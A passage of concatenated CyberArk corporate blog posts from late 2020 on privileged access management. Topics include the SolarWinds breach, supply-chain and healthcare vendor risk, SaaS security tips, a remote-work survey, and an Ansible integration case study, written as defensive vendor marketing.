“During this COVID pandemic, messaging apps have become a popular way to communicate – and they allow threat actors to make communications appear more personal,” says Lazarovitz. “It’s not just a spamming email or something. Now you get tailored messages, sometimes you get GIFs and you feel more comfortable looking at it, interacting with it, but just viewing it can compromise someone’s identity and let a threat actor gain a foothold.”

As Lazarovitz goes on to explain, attackers rarely home in on one target and “smash and grab” to get it. He describes it as more of a “living off the land” approach, where a threat actor won’t use any outside tools but will utilize an organization’s own administrative tools and communication platforms to appear as normal and non-invasive as possible. Combining that with personalized messages and “normal” interaction, gaining access to credentials, and overcoming access controls becomes that much easier.

It’s why breaches are rarely dramatic events at the outset, and often don’t immediately raise red flags. “The threat actor can use a dormant privileged account to get in undetected, and once within the network, they can reach out to people directly disguised as one of their own employees,” Lazarovitz says, reinforcing the idea that the goal of many cyberattacks is to exist within an organization’s ecosystem for as long as it can, appearing as “normal” as it can. As the Verizon Report indicates, not only does it take an average of months to even years to detect an attack in 69% of breach incidents, but often the breach isn’t even detected by the victim organization itself but rather by a third party.

“These espionage campaigns are very long and slow, they take a lot of time. After conducting reconnaissance, attackers seek out privileged credentials and accounts, then escalate privileges that allow them to move laterally and vertically toward their target, which obviously, in many cases, is sensitive data,” Lazarovitz says.

Threat actors take full advantage of both the growing sophistication of messaging apps and communication software, and their ubiquitous use as organizations implement more remote staff. The flaws are many, and there isn’t what Lazarovitz describes as a “silver bullet” to fix them all.

That’s where post-exploitation research and adversary simulation come in, employing a host of tactics, techniques, and procedures (TTPs) used in real-world attacks to uncover hidden vulnerabilities, test security procedures, and pinpoint areas that need to be improved. Security-focused teams like Lazarovitz’s comprise experts from various backgrounds, harnessing their talents and natural curiosity to think and act like real attackers who’ve gotten inside – helping organizations prepare for real attacks against their infrastructure.

While such teams, which spend almost equal time defending against known threats as they do anticipating the unknown – are vital, cyber-espionage actually benefits the most from the tiny, seemingly innocuous mistakes that everyone is prone to. This is both a source of frustration and a reminder that the threat to our digital lives isn’t necessarily nebulous and inevitable.

The threats we face won’t take the form of elaborate, cinematic attacks. They’ll be mundane, seemingly innocuous, and waiting for the slightest crack to emerge. And that’s why healthy suspicion, constant vigilance, and a “think like an attacker” mindset are the foundation of effective cybersecurity.

]]>
Four Ways to Protect Against Supply Chain Infiltration https://www.cyberark.com/blog/four-ways-to-protect-against-supply-chain-infiltration/ Thu, 07 Jan 2021 15:24:38 +0000 https://www.cyberark.com/?p=107445

The far-reaching SolarWinds Orion attack has catapulted supply chain security vulnerabilities into the spotlight – particularly those involving the third-party software applications and hardware components that comprise much of today’s enterprise IT environments.

The attack, which potentially impacted more than 18,000 organizations to date, stems from a compromise of third-party network management vendor SolarWind’s Orion software. A sophisticated threat actor reportedly distributed malicious source code within an Orion software update – leveraging the very means by which organizations protect themselves against potential threats. This allowed the attacker to gain a foothold into victim organizations, steal and abuse legitimate identities and credentials, escalate privileges and move laterally and vertically to access valuable assets – and then maintain persistent access using the Golden SAML technique, never seen before in the wild.

The Evolution of Supply Chain Attacks

While the SolarWinds compromise is unprecedented in many ways, supply chain attacks are far from new. Attackers have long targeted third-party vendors across both digital and physical supply chains – from software and technology providers to attorneys and consultants, to manufacturing and logistics companies – as backdoors to the networks of their enterprise or government business partners.

According to Bloomberg, the Cybersecurity and Infrastructure Security Agency (CISA) reported in 2019 that federal agencies faced about 180 different threats from the digital supply chain alone. And in recent months, the world has seen a surge in supply chain attacks targeting healthcare companies involved in COVID-19 vaccine development and delivery. Today, the SolarWinds supply chain attack shows us just how precisely targeted threat actors have become.

A Realistic Zero Trust Approach that Won’t Hamstring Supply Chain Operations 

Working with numerous third-party vendors is an inevitable part of doing business, but it also creates security blind spots that can become dangerous. To protect themselves, many companies and government agencies are embracing Zero Trust models – in which they trust nothing and verify everything. But as vendor ecosystems grow in size and complexity, a hard and fast “trust nothing” strategy down the supply chain can quickly inhibit business operations and slow innovation. A successful security strategy must be both realistic and sustainable.

Shay Nahari, Head of CyberArk Red Team Services, outlines steps organizations can take to significantly reduce the impact of a potential supply chain attack in this Dark Reading article. Here are four takeaways based on his piece:

1. Protect Privileged Access. With dramatic cloud migrations underway and the adoption of transformative digital technologies, privileged accounts and credentials represent one of the largest attack surfaces for organizations today. Identifying and managing privileged access is paramount to disrupting the attack chain – regardless of whether the attacker infiltrated the environment via the supply chain or by other means – and maximizing risk mitigation.

2. Embrace a Defense-In-Depth Approach. There is no silver bullet for cybersecurity, and no one vendor or tool can completely prevent an attack. An assume breach mindset calls for multiple layers of security, such as endpoint detection and response, next-gen antivirus, strong privileged access management and application, and OS patching. But remember, cybersecurity is a journey, and it doesn’t have to happen all at once. A good starting point is to adopt a risk-based approach, investing first in the security controls that reduce the greatest amount of risk.

3. Consistently Enforce Least Privilege Everywhere. While breaches are inevitable, organizations can take steps to limit the blast radius of an attack by eliminating unnecessary privileges and permissions based on the principle of least privilege. Widespread adoption of public cloud services and SaaS application has accelerated the need for least privilege controls in cloud environments. In fact, a recent ESG survey ranked overly permissive privileges as the most common attack vector against cloud applications. Strong least privilege enforcement can help prevent all identities, whether on-premises or in the cloud, from reaching sensitive targets.

4. Monitor for Privileged Credential Theft. As the SolarWinds attack shows, sophisticated attackers go to great lengths to hide their activity and avoid detection, and it can be extremely difficult to spot a supply chain infiltration. By monitoring privileged sessions, organizations can more easily spot suspicious behavior and patterns indicative of credential theft and better understand what critical assets are being targeted – enabling faster, more decisive response to protect the organization.

The supply chain represents a critical attack vector, however, by leading with an “assume breach” mindset and securing access to sensitive data and systems, organizations can make it significantly more difficult for attackers to accomplish their end goals.

If you have been affected by the SolarWinds Orion attack, or if you’re currently focused on strengthening your organization’s security posture, learn how our free Privileged Access Management (PAM) Rapid Risk Assessment and Remediation Offer can help you minimize exposure to this breach, while laying the foundation for longer-term, proactive strategies to help prevent supply chain infiltration and privileged credential compromise to protect your organization today and into the future.

]]>
A Look Back at 2020 Reveals Why Privilege Matters More Than Ever https://www.cyberark.com/blog/a-look-back-at-2020-reveals-why-privilege-matters-more-than-ever/ Mon, 28 Dec 2020 21:52:09 +0000 https://www.cyberark.com/?p=106840 Why Privileged Access Matters

As 2020 draws to a close (and, let’s face it – the new year really can’t come soon enough), we’re taking a look back at some of our most notable blogs, articles, and webinars of the year. Throughout the content, a common theme crystalizes: though the world turned upside down this year, what hasn’t changed is the fundamental way attackers operate – they go straight for organizations’ most valuable assets, from personal customer data to intellectual property for a COVID-19 vaccine to highly classified government secrets.

The recent SolarWinds Orion breach, and its far-reaching impact on public and private companies around the world, show us just how precise and sophisticated attackers have become. The unfortunate truth is, if an attacker wants to get into your organization right now, they probably will, whether it’s by compromising a vendor in your supply chain, phishing a highly privileged worker, targeting a misconfigured cloud account, or by other cunning means.

The best way to combat these evolving threats is to think like an attacker, fully embracing an “assume breach” mindset, accepting that attacks are inevitable and, as such, focusing time and efforts on protecting the assets that matter most to your business.

Privileged access is the gateway to those valuable systems and is at the core of nearly every major advanced attack. Though this isn’t a new phenomenon, in a time of widespread disruption and change, strong privileged access management (PAM) matters now more than ever. The following list of CyberArk resources published over the past year can help you better understand why, and provide you with the tools and insight needed to help improve security at your organization.

Cyber Attacks in the Pandemic Era: More of the Same Tried-and-True Approach

Since COVID-19 began its spread far and wide, we’ve seen near-constant headlines featuring cyber attacks, including many targeting organizations focused on stopping the virus. This post by Lavi Lazarovitz, head of CyberArk Labs, examines recent attack trends, vectors, and tactics– and reminds us that while opportunistic attackers will “never let a good crisis to waste,” their approach remains largely the same – and remains largely effective.

The Cloud Explosion and New Threat Landscape

If the cloud was important before COVID-19, it became absolutely essential in its wake. Simplifying operations and offering cost savings and scalability to stand up mobile, remote workforces quickly, organizations doubled down on public cloud services and SaaS applications in 2020. And just like that, cyber attacks targeting the cloud surged by 630% in mere months. Through the eyes of an attacker, every unsecured or misconfigured cloud identity, whether human, machine, or application, now represents an opportunity. In this piece, Sam Flaster explains why least privilege access is the key to effective cloud protection and an integral part of a proactive “assume breach” approach to cybersecurity.

“Assume Breach” from Inside and Other Learnings from 2020 Twitter Attack

In a time of unrelenting external attacks, the insider threat is not always top of mind. Yet an “assume breach” mentality – similar to Zero Trust models – requires organizations to trust nothing and verify everything – whether it comes from inside or outside the organization, or via a third-party vendor – before granting privileged access to sensitive data and assets. Consider this year’s highly publicized Twitter attack, which would not have been possible without the (unintentional) assistance of insiders with powerful system access. We break down the attack in this Q&A with Nir Chako, Security Research Team Leader for CyberArk Labs.

Remote Work Is Here to Stay: Steps to Secure the Permanent “New Normal”

The Q4 2020 CyberArk State of Remote Work study found that 95% of employees want to continue remote working, even after it’s deemed safe to return to the office. Many employers are adapting to make this “new normal” a “permanent normal” for employees and individuals across their supply chains. Yet, risky security practices could force businesses to reconsider the long-term viability of remote work. This piece by Corey O’Connor outlines four ways privileged access management can help organizations effectively balance security and user productivity and convenience to make remote work “work” for the long term. You can also listen to these recommendations in our on-demand webinar.

Four Strategies to Stop the Cyber Attack Cycle

Securing privileged access helps shrink the attack surface by breaking the attacker toolset and restricting the spread of an attack. Limiting lateral movement forces attackers to use tactics that are ‘louder’ and more easily identifiable, often alerting the organization of the attack so it can respond and halt its progression. This Dark Reading article – based on analysis by CyberArk Labs – outlines strategies for using strong privileged access controls to stop privileged credential compromise and escalation, prevent lateral movement, slow the spread of ransomware and minimize the risk of account takeovers.

The Future of PAM and Reducing Risk for Modern Digital Enterprises

As organizations like yours embrace cloud, hybrid IT, DevOps, remote work models, automated workflows, and other transformational technologies, the role of privileged access management has evolved to secure these trends at zero point. Check out this webinar to hear from KuppingerCole Senior Analyst Paul Fisher and CyberArk Executive Vice President Adam Bosnian on PAM business drivers, trends, and alignment with modern business demands – and how the right, advanced solution can help your organization accelerate digital transformation, drive efficiency, maintain compliance and reduce risk.

How to Achieve Sustained PAM Program Success

If you’re looking for help in developing or maturing your organization’s privileged and identity access management programs today, don’t miss this webinar on the CyberArk Blueprint – our PAM maturity framework based on decades of experience working with thousands of global customers. You’ll see the Blueprint in action across a series of use cases, and get prescriptive guidance on how to drive lasting organizational change and achieve measurable, progressive results that reduce privilege-related risk.

When it comes to cybersecurity, 2020’s bottom line is this: Your organization cannot stop attacks if you don’t secure privileged access everywhere – in the cloud, on endpoint devices, in applications, within automated processes and throughout the DevOps pipeline. As you look to the year ahead, take a hard, honest look at your current security practices. Don’t assume what you’re reading about in today’s news headlines can’t happen to you. Make privilege a 2021 cybersecurity priority and stay a step ahead.

]]>
The SolarWinds Breach and the Privilege Priority https://www.cyberark.com/blog/the-solarwinds-breach-and-the-privilege-priority/ Wed, 23 Dec 2020 08:00:37 +0000 https://www.cyberark.com/?p=106569

The details of the SolarWinds Orion breach continue to unfold, with the impact of this supply chain attack rippling throughout the tech community and across the more than 18,000 public and private sector organizations directly affected worldwide. It could be several months until the extent of the damage is fully understood. But today, we can examine what has been reported about the Tactics, Techniques and Procedures (TTPs) used, map out common attack patterns and identify steps organizations can take to mitigate associated risks and lessen further damage.

The Privileged Pathway Most Traveled

The SolarWinds Orion compromise and subsequent attack of customers using this software is unprecedented in its sophistication, scope and scale. However, what it does have in common with other attacks is that the compromise of identities and privileged access played a critical role.

Today’s cyber adversaries have the advanced tools and resources to infiltrate even the most sophisticated IT environments, whether through phishing attacks, software vulnerabilities, supply chain compromise or other means. Once they establish a foothold, they often follow these well-established steps in the attack chain:

  • Attempt to steal and abuse the identities and credentials of employees or authorized third parties.
  • Use these legitimate credentials to move laterally and vertically through the network, looking for high-value targets or to establish persistence. Because attackers appear to be “authorized” users, organizations have a hard time detecting their presence.
  • Target privileged account credentials that provide special access to systems or abilities that reach beyond those of a typical user – and work to escalate these privileges until they reach the confidential information they intend to steal or services they wish to disrupt.

The SolarWinds breach and the resulting attacks exhibit all three of these tried-and-true tactics. With dramatic cloud migrations underway, and the adoption of transformative digital technologies, the enterprise attack surface is expanding with greater privileged access present across these decentralized environments. Attackers know this, which is why securing privileged access matters more today than ever before.

This attack underscores the urgency for every organization – no matter industry or size – to adopt an “assume breach” mindset. By approaching cybersecurity as if an attacker is already inside their infrastructure, organizations can narrow their focus and take the necessary steps to protect their most sensitive data and applications to prevent data theft or business disruption.

Protecting Your Environment from Advanced Attacks

While there is no one vendor or tool that can completely prevent such breaches from happening, there are immediate steps that organizations can take to help minimize their exposure to this SolarWinds breach, including:

  • Deploy a Privileged Access Management (PAM) solution or validate existing PAM deployments
  • Rotate credentials on a regular cadence
  • Restrict access to Tier0 assets from a specific, hardened control point
  • Isolate sessions when privileged credentials are used
  • Detect backdoor account creation
  • Deploy “least privilege” measures to endpoints and workstations (including those used to administer the PAM solution)
  • Monitor for managed credential use outside the PAM solution
  • Establish normal behavior patterns of existing users and elevate to stronger authentication when anomalies are detected
  • Enable risk aware, adaptive Multi-Factor Authentication (MFA) whenever possible

How CyberArk Can Help

As the leader in Privileged Access Management (PAM), CyberArk is here to help organizations that have been affected by the SolarWinds attack. We’ve activated our community of CyberArk experts and professional services team to provide a Privileged Access Management (PAM) Rapid Risk Assessment and Remediation offer.

This offer starts with a free privileged access assessment (including recommendations) at no cost to customers who were running the compromised Orion software in their environment. Should additional steps be needed, CyberArk and our certified partners can assist customers in prioritizing PAM controls such as credential management, multi-factor authentication, session isolation and least privilege on endpoints and servers for rapid risk reduction. Such measures will be based on findings from the customer’s incident response team and in alignment with the CyberArk Blueprint for PAM Success.

CyberArk stands by the organizations that have been impacted by the SolarWinds attack and we remain steadfast in our mission and commitment to help organizations secure their most valuable assets and stay one step ahead of attackers.

]]>
Here’s What Worked, and What Didn’t, for Remote Workers in 2020 https://www.cyberark.com/blog/heres-what-worked-and-what-didnt-for-remote-workers-in-2020/ Thu, 17 Dec 2020 13:23:46 +0000 https://www.cyberark.com/?p=106440 Remote Workers Survey

As the meme goes, 2020 has been a long decade – and it certainly feels that way. The global COVID-19 pandemic has upended our sense of normalcy and forced many aspects of everyday life into the confines of home. Where we, in the absence of social gatherings and holiday festivities, now have lots of free time to reflect on the year and, of course, scroll through all those “worst of 2020” memes.

The way we work has also changed dramatically during this year. To check in on how employees are faring after nearly nine months of remote work (aka WFH), we surveyed 2,000 remote employees around the world asking them what they like – and dislike – most about their new working arrangements. Here’s a look at some of our findings.

Remote Workers Survey: Benefits and Challenges

WFH Diary Entry #35. I’ve logged 50 miles of walking this month during lunch breaks and feel healthy and focused. The extra 45 minutes of sleep each morning doesn’t hurt either. Long live remote work!

For many office workers, hectic mornings of school car lines and bumper-to-bumper traffic are but a distant memory. We’ve settled into new normal(ish) routines, commuting from upstairs to down and bed to desk, ready to take on the workday from the couch or home office.

The shift to remote work has been a big change, but for most people, it’s been a largely positive one. Nearly half (47%) feel more productive at home, citing the flexibility to run errands, take a walk or do household chores between meetings. Meanwhile, 32% of remote workers say putting their commutes in park is a key benefit. Plus, it’s (basically) a scientific fact that wearing sweatpants while working increases one’s overall mood and sense of wellbeing.

With more time and flexibility in their days, it’s unsurprising that 95% of employees want to continue working from home even after their offices re-open.

WFH Diary Entry #68. Signing in from the kitchen table – feeling good about today’s big meeting. The gang’s all here… including the cat who won’t get off my keyboard… and a virtual classroom of 20 kindergarteners. What could possibly go wrong?! 

Of course, remote work has its downsides (quarantine 15, anyone?). For instance, nearly half of respondents (45%) say disruption from family and pets is their biggest challenge. Anyone who’s had to proctor a spelling test while giving a work presentation while frantically muting every other word to muffle their barking dog can relate. And as the lines between work and home blur, always-home and always-on increasingly means always-working. Forty-three percent of remote workers say they struggle to maintain the right work/life balance.

WFH Diary Entry #106: This Zoom meeting could have been an email. Also, my kids are suspiciously quiet right now.  

For the first few weeks of remote work, it was sort of fun to connect with colleagues by video. We saw their home offices, “met” their significant others and kids (hopefully not wielding dripping paint brushes), and gushed over their adorable pets. We got creative with elaborate video backgrounds and turned ourselves into virtual potatoes during team brainstorms. But for most people, the novelty wore off quickly. Many working parents are still juggling work meetings and virtual schooling – there is no secret recipe to keep these in peaceful co-existence. And what once was a quick ‘swing by someone’s desk’ to ask a question is yet ANOTHER 30-minute video call. It’s no wonder 34% of remote workers cite “Zoom fatigue” as a top challenge.

WFH Diary Entry #112: Have so much to do today but I’m locked out of the system again. IT support ticket says 48 hours… there goes my productive week.

For 78% of employees, working through technical issues like connecting securely to corporate systems and resources is a major hurdle. To stay productive and keep up with work responsibilities, 67% admit to finding workarounds to corporate security policies, from sending work documents to personal email addresses and sharing passwords, to installing rogue applications on company-issued devices.

While these shortcuts may seem harmless, they can potentially open doors for cyber attackers, leading to credential theft, fraud, and costly security breaches. This is why now’s as good a time as any to brush up on cybersecurity best practices to protect your own digital persona, along with your employer’s. And if you’re like 46% of respondents who haven’t received remote-work-specific security training, ask about it and do your part to keep safe and secure remote work a viable option for the long run. It’s everyone’s responsibility to keep safe and secure in our remote and hybrid work environments. Your sweatpants will be glad you did.

]]>
How to Secure Your SaaS Applications https://www.cyberark.com/blog/how-to-secure-your-saas-applications/ Wed, 16 Dec 2020 15:54:10 +0000 https://www.cyberark.com/?p=106201

Editor’s Note: This is part four of a blog series on securing privileged access and identities in the cloud.

Now more than ever, Software as a Service (SaaS) applications not only enable communication and collaboration, they’re also a lifeline for remote workers, and are helping organizations efficiently manage internal operations, rapidly innovate to stay ahead of the competition, and deliver greater customer value.

While a majority of enterprises rely on these business-critical SaaS applications, like cloud-based CRM and email platforms, a CyberArk survey of business and IT decision-makers found nearly 70% do not prioritize their protection. Further, 56% of respondents reported an issue that affected the confidentiality, integrity, or availability of their business-critical applications within 24 months of the study.

With SaaS applications, it’s relatively easy for an individual within an organization to purchase a subscription with a credit card without going through formal procurement processes or involving finance or IT. While this ease of deployment and adoption is a benefit over traditional on-premises applications, it also gives rise to “shadow IT.” When IT security teams don’t approve, manage or even know about rogue SaaS applications, the risk of exposure and data breaches can increase substantially.

Properly securing and managing SaaS applications is an essential part of a comprehensive cybersecurity strategy. Here are five ways to get started:

  1. Treat all administrative access to SaaS applications, such as admin accounts used to set up single sign-on (SSO) integrations, as privileged. In most organizations, a variety of users access admin accounts for SaaS applications, such as Salesforce, ServiceNow, Jira, Docusign, DropBox and more. Take shared accounts for corporate social media platforms, for example. Credentials are often shared across teams and even third-party contractors and are rarely changed, making them easy targets for external attackers and malicious insiders. Such accounts must be viewed as privileged accounts and best practices for privileged access management must be implemented to mitigate the risk of compromise. Specifically, privileged credentials should be secured in a central vault, automatically rotated, and all activity must be recorded and available for audit. Human, machine, and application users with access to sensitive information for SaaS applications should also be considered privileged.
  2. Implement single sign-on to secure access to cloud apps. As companies bring more SaaS applications online, login credentials become increasingly attractive targets for attackers. Passwords alone are not enough to verify a user’s identity and protect businesses from data loss, fraud, and malicious attacks. SSO leverages a central identity provider such as Microsoft Active Directory, Azure AD, Okta Universal Director, or Ping Identity to manage user authentication and grant access to SaaS applications through a single set of login credentials. This improves security with stronger password policies, increases productivity with simplified access to all the applications employees need to do their jobs, and makes it easier for IT to monitor and manage access across the entire enterprise.
  3. Strengthen access controls with multi-factor authentication (MFA). MFA helps ensure users are who they say they are by requiring them to pass multiple authentication challenges like providing a one-time code sent to their mobile devices. In the remote work era, SaaS applications are regularly accessed from outside the corporate network and MFA is an instrumental layer in verifying user identities and preventing the use of compromised credentials. But do not forget that the privileged accounts used to manage MFA software must also be protected at all times with strong privileged access controls.
  4. Install and integrate an identity governance solution. Integrating with industry-leading identity governance and administration (IGA) solutions enable organizations to gain a unified view of their identity landscape, and consistently manage all identities, including privileged identities and access entitlements, based on defined company policies to meet regulatory compliance and access policy requirements.
  5. Stay up to date. Leverage a central identity provider to manage user authentication for application provisioning and de-provisioning so that SaaS console access is automatically removed when an employee leaves the organization or if their role changes within the organization. This is critical so that users can’t continue to access cloud services they don’t actually use or need. Implementing least privilege, in which all identities have only the minimum necessary entitlements to perform their ongoing responsibilities, is a best practice and makes it more difficult for attackers to escalate privileges. We’ll explore this further in our next post in this series.

A comprehensive approach to identity and privileged access management can help secure the human, machine, and application credentials used by your organization’s SaaS applications as well as your cloud-native applications built using DevOps methodologies. Learn more in our eBook, “Securing Privileged Access and Identities in 5 Key Cloud Scenarios.”

]]>
Healthcare’s Third-Party Privileged Access Problem Is Now a State of Emergency https://www.cyberark.com/blog/healthcares-third-party-privileged-access-problem-is-now-a-state-of-emergency/ Fri, 11 Dec 2020 15:59:54 +0000 https://www.cyberark.com/?p=106062 Healthcare’s Third-Party Privileged Access Emergency

A technology disruption in a hospital operating room or an emergency response chain can spell the difference between life and death. Yet as healthcare providers, medical R&D, and pharmaceutical companies around the world work to combat the spread of COVID-19, cyber criminals are taking calculated steps to hit these organizations… just when society needs them most. In many cases, attackers are targeting third parties and vendors with privileged access to these organizations’ critical data and systems. Sadly, this has become a regular occurrence for companies involved in COVID-19 vaccine research, development, and delivery.

On Wednesday, the European Medicines Agency (EMA) – the EU’s governing body responsible for assessing and approving vaccines – disclosed it was the subject of a cyber attack.  While they did not divulge specifics, Ars Technica reports that shortly thereafter, pharmaceutical company Pfizer and biotech company BioNTech issued a joint statement indicating documents related to their COVID-19 vaccine candidate had been unlawfully accessed via an EMA server. The statement notes that “no BioNTech or Pfizer systems have been breached in connection with this incident and we are unaware that any study participants have been identified through the data being accessed.”

The exact attack timeline and the attackers’ motivations are unconfirmed, but the disclosure comes just weeks after Pfizer and BioNTech announced that their “BNT162b2” vaccine is 95% effective in preventing COVID-19.

This attack is just one in a string of breach attempts on third parties that have access to valuable vaccine information.

Last Thursday, headlines emerged on a large-scale email phishing campaign targeting coronavirus vaccine supply chains. The IBM research team that uncovered the threat wrote that “the precision targeting of executives and key global organizations hold the potential hallmarks of nation-state tradecraft.” They went on to assess that “the purpose of this campaign may have been to harvest credentials to gain future unauthorized access. From there, the adversary could gain insight into internal communications, as well as the process, methods, and plans to distribute a COVID-19 vaccine.”

The supply chain attack prompted a warning from the Department of Homeland Security and highlighted the challenges today’s R&D organizations and interconnected healthcare providers face in protecting life-saving systems, sensitive patient data, and valuable intellectual property from attacks via third-party ecosystems.

Healthcare Partners and Suppliers are High-Value Targets

The healthcare industry is increasingly relying on technology – including SaaS applications, IoT-enabled devices, mobile diagnostics systems, telemedicine platforms, and more – to improve patient services and optimize clinical outcomes.

Modern integrated care delivery hinges on the ability to exchange patients’ protected health information (PHI) across all identities and technology components. Privileged accounts and credentials make this “interoperability” possible by allowing administrators to access applications or data, or for devices and systems to access one another. Everything from cloud-based virtual care applications to patient diagnostic data integration from third-party services requires privileged access.

Attackers know that privilege is the path to PHI – and they’re highly motivated to gain access. A single PHI record can fetch as much as $363 on the dark web, compared to credit card records which only go for $1-2. One can only imagine what confidential COVID-19 vaccine “recipes” and related intellectual property could net.

But why try to break into a heavily guarded fortress when you can just hijack a delivery truck that’s authorized to enter the premises? That’s how attackers think and that’s why they target providers, third parties, and vendor organizations of all sizes across the continuum of care.

For example, a few years ago a popular SaaS-based transcription service was targeted in a NotPetya ransomware attack. The resulting outages impacted major US healthcare systems, obliterating doctors’ instructions to patients and disrupting numerous critical services, from imaging to order processing to patient care tracking software. The ripple effects of the attack impacted patient care for weeks, and the software company itself lost $92 million in revenue as a result.

According to a recent Ponemon report, the average hospital has relationships with more than 1,300 different external vendors. Each vendor identity requires different levels of privileged access to the healthcare organization’s data and systems to perform its role, from managing medical devices to keeping patient chart records up to date. Manually provisioning and managing privileged access for each of these identities is a major undertaking for IT and security staff. This may contribute to why only 36% of healthcare providers believe they can effectively prioritize external vendor risk, despite 80% believing it’s “very important” to do so.

A new study of more than 700 providers indicates healthcare-specific data breaches will triple in volume in 2021. To protect their organizations from unrelenting attacks – from the outside, inside, and across their third-party networks, healthcare IT security teams need the ability to scale their efforts and automate as many identity and privileged access management tasks as possible, like credential and session management, vendor identity authentication and just-in-time provisioning. Not only does this minimize time-consuming operational tasks, it makes it easier for verified vendors to access the systems, devices, and data they need to do their jobs, exactly when (and only when) they need to.

To learn more about our approach to managing identity-related risk across the healthcare continuum visit here, and check out CyberArk Remote Access, our SaaS solution that enables healthcare companies to automatically provision access to external third-party vendors that require privileged access to internal resources. Try a free 30-day trial of CyberArk Vendor Privileged Access Manager today!

]]>
Into The Matrix: Defense Contractor Takes the Red Pill to Accelerate Network Automation https://www.cyberark.com/blog/into-the-matrix-defense-contractor-takes-the-red-pill-to-accelerate-network-automation/ Mon, 07 Dec 2020 14:18:49 +0000 https://www.cyberark.com/?p=105765

Our modern world is built on vast interconnected systems of network devices. Within an organization, networks keep everyone and everything connected and up and running. To maintain a strong cybersecurity posture, network infrastructure must reflect the well-known CIA “triad” of confidentiality, integrity and availability. Each configuration within the network is comprised of multiple pieces of equipment, each secured by credentials and secrets, and must remain confidential with access granted only to authorized personnel. To maintain integrity, each configuration must also be consistent and compliant within various frameworks and standards. And to meet availability standards, each device must be continuously updated to keep things running smoothly and securely.

Maintaining this security triad is paramount for government agencies and their partners as they hold both sensitive data and the keys to critical infrastructure. Yet their IT security teams face challenges in scaling security across these increasingly complex, interconnected global networks. Manually managing tens of thousands of networking devices often requires several full-time staff members and hundreds (perhaps thousands) of hours spent backing up the system and maintaining configuration standards alone. As IT shops work hard to do more with less, while facing pressure to speed processes and maximize efficiency, automation is now the name of the game and a strategic component of digital transformation. While the notion of automating a huge network may seem intimidating at first, it doesn’t have to be that way.

This is a story of how a leading defense contractor took a lean, mean, automated approach to managing their machines — by diving head-first into The Matrix.

Into The Matrix: Automation Unlocks a New Dimension

In the pop-culture classic film “The Matrix,” starring Keanu Reeves, the character Neo was presented with a tough choice: keep your old life and maintain status quo by choosing to take a blue pill or discover a whole new world and limitless possibilities by taking the red pill.

Once Neo chooses to take the red pill, the world of The Matrix opens up to him. Not only does he learn that everything about life as he knew it was a lie, but he also learns how to manipulate the world around him to make things easier and more efficient. For example, he is able to bypass decades of martial arts training just by “plugging in,” mastering kung fu in a matter of seconds. This “automatically” acquired skill becomes valuable later on in the movie when he faces the antagonist Agent Smith in the final life-or-death showdown.

Sure, this comparison isn’t perfect – after all, we’re talking about automating systems and machines, not learning kung fu. But when presented with the option of putting thousands of hours into manual configuration or automating the network, the choice is clear: automation can make all the difference when facing metaphorical “Agent Smiths,” from rogue attackers to relentless nation-states.

How a Defense Contractor Mastered the Matrix with the CyberArk Ansible Tower Integration

For this government defense contractor, automation was crucial to conquering the gargantuan task of securely configuring and maintaining thousands of routers, switches, and other networking devices across its network. For this organization, Red Hat’s Ansible Platform was a natural choice, providing a simple, device-agnostic way to automatically configure their network stack, simplify authentication processes, and continuously test and correct network configuration issues.

But to make this automation “magic” happen across so many different functions and systems, tools like Red Hat Ansible require highly privileged access in the form of identities, credentials, and secrets. This far-reaching access makes these tools very powerful – and also very attractive targets for cyber attackers, who, just like many organizations today, are focused on working smarter not harder. If they can gain access to privileged credentials that open direct doors to sensitive assets and data, they can save a lot of time and effort.

Understanding these risks, the defense contractor brought together a powerful trio of Red Hat Ansible Tower, CyberArk Secrets Management, and Cisco Identity Services Engine (ISE) to protect and programmatically rotate privileged credentials and secrets, meet compliance requirements, accelerate its strategic automation push, and ultimately, tame the Matrix.

Here’s how it works.

  • Using secrets and privileged credentials, Ansible Tower accesses and interacts with Cisco ISE to log on to each networking device and perform automated duties, such as backup configuration, network configuration maintenance, and more.
  • Instead of storing these secrets in Ansible Tower itself – which creates another potential attack vector and operationally reduces overhead with secrets management – the CyberArk Ansible Tower integration directs all credential requests to CyberArk Secrets Management.
  • All Cisco ISE secrets and credentials are centrally stored, monitored, rotated daily (based on the contractor’s specific policies and requirements), and audited by the CyberArk Privileged Access Manager solution. When a credential is needed, Ansible Tower retrieves it via a query, enabling secure access to Cisco ISE.
  • Ansible playbooks can rapidly and seamlessly access and use the credential, brokering access and enabling the automated process.
  • And to make it even easier, integrations between Ansible and CyberArk, and with Cisco and CyberArk, are available in the CyberArk Marketplace.

With this integrated and centralized secrets management approach, the organization can stay in compliance, easily audit all access throughout various Ansible nodes and rapidly rotate device passwords based on policy or an incident – all without changing workflows, breaking automation, or adding operational complexity or overhead.

Today, the defense organization can automatically patch, reconfigure and update more than 80,000 networking devices in less than two hours. By eliminating these manual processes, the IT security and network operations teams have saved hundreds of thousands of work hours and can now dedicate significantly more time to business-critical tasks that move the organization forward.

Working together, CyberArk, Ansible Tower, and Cisco ISE have automated the network – and this defense contractor client has tamed its own Matrix, much like Neo did.

To hear the full story, tune in to our recent AnsibleFest 2020 talk (free registration required). To learn how CyberArk combined with Red Hat can help your organization securely automate processes and unleash operational efficiencies, check out these resources:

]]>
2021 Cybersecurity Trends: The Emergence of the Personalized Attack Chain https://www.cyberark.com/blog/2021-cybersecurity-trends-the-emergence-of-the-personalized-attack-chain/ Tue, 01 Dec 2020 12:51:08 +0000 https://www.cyberark.com/?p=105413 Cybersecurity Trends 2021

It’s hard to look forward to 2021 without considering the cybersecurity trends that shaped the generally unfavorite year known as #2020. History books will, of course, remember this year mostly for two major events – the COVID-19 pandemic and the US presidential election. From a business perspective, the pandemic has altered nearly every aspect of how organizations operate. From the rapid shift to remote work to completely rethinking every aspect of the customer dynamic, the business world has been turned on its head.

These changes have also caused a dramatic acceleration in digital initiatives across industries. Many drove what felt like 5 years of transformation in 5 months – as they quickly adopted technologies to help productivity and business continuity. Whether it was bringing on new collaboration tools or moving critical infrastructure and applications to the cloud, everything has become more distributed – and as a result, has significantly increased opportunities for attackers.

As we look ahead to 2021, how will the convergence of these unimaginable forces and events impact cybersecurity for the next 12 months?

I checked in with some of our in-house experts and here’s what they had to say:

Personal Islands of Security Shift the Attacker’s Mindset

As more and more companies look at remote work strategies for the long term, distributed IT environments are only going to continue to expand. With many employees working from home, they are regularly accessing corporate systems and resources through insecure home networks and personal devices – making each and every user their own island where legacy security controls are ineffective. Individual actions are threatening corporate security to a greater degree than ever before.

